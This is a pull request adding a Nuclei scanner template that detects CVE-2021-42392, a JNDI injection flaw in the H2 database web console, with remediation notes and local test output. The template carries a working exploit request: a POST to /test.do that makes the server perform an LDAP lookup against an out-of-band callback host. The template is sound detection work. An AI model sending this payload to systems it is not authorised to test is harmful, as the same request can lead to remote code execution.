### PR TITLE
Added CVE-2021-42392 Template

### DIFF
--- a/http/cves/2021/CVE-2021-42392.yaml
+++ b/http/cves/2021/CVE-2021-42392.yaml
@@ -1,0 +1,58 @@
+id: CVE-2021-42392
+
+info:
+  name: H2 Database Console - JNDI Injection RCE
+  author: i-am-paradox
+  severity: critical
+  description: |
+    The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution via the H2 web console (versions before 2.0.206 / 1.4.198 with the console enabled).
+  impact: |
+    An unauthenticated attacker can trigger an outbound JNDI lookup to a server they control, leading to remote code execution on the host running the H2 web console.
+  remediation: |
+    Upgrade H2 database to version 2.0.206 or later, and disable the web console (spring.h2.console.enabled=false) or restrict access to it.
+  reference:
+    - https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
+    - https://github.com/advisories/GHSA-h376-j262-vhq6
+    - https://github.com/h2database/h2database/commit/b24aa46f48904ce64443f8f4353d70a2eed09037
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42392
+    - https://github.com/vulhub/vulhub/tree/master/h2database/CVE-2021-42392
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-42392
+    cwe-id: CWE-502
+    cpe: cpe:2.3:a:h2database:h2:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 2
+    verified: true
+    vendor: h2database
+    product: h2
+  tags: cve,cve2021,h2database,jndi,rce,oast,java,kev,vuln
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /test.do?jsessionid={{jsessionid}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        driver=javax.naming.InitialContext&url=ldap://{{randstr}}.{{interactsh-url}}&user=&password=
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the DNS interaction
+        words:
+          - "dns"
+
+    extractors:
+      - type: regex
+        name: jsessionid
+        group: 1
+        regex:
+          - 'jsessionid=([0-9a-zA-Z-]+)'
+        internal: true


### PR DESCRIPTION
## Template Details

- **CVE:** CVE-2021-42392 (KEV-listed, see #7549)
- **Type:** Unauthenticated JNDI injection in the H2 web console. The `/test.do` endpoint accepts `javax.naming.InitialContext` as the driver class along with an attacker-controlled JNDI URL, which the server then looks up.
- **Detection:** The template first requests `/` and extracts the `jsessionid` from the console redirect, then POSTs the JNDI payload to `/test.do` with an Interactsh URL and confirms the OOB DNS interaction.
- **References:**
  - https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
  - https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6
  - https://github.com/vulhub/vulhub/tree/master/h2database/CVE-2021-42392

## Verification

Tested locally against a vulnerable instance (H2 2.0.204 via `java -cp h2.jar org.h2.tools.Server -web -webAllowOthers -ifNotExists`):

1. `nuclei -validate -t CVE-2021-42392.yaml` passes
2. Against the vulnerable instance the template fires and the DNS interaction is confirmed:

```
[CVE-2021-42392:word-1] [http] [critical] http://127.0.0.1:8182/test.do?jsessionid=77473a1e6dd93a99cdb375b86d0cc602
```

3. Tested against a plain HTTP server as well — no match, no false positive.

2 requests total, one template per PR. Let me know if anything needs to be changed.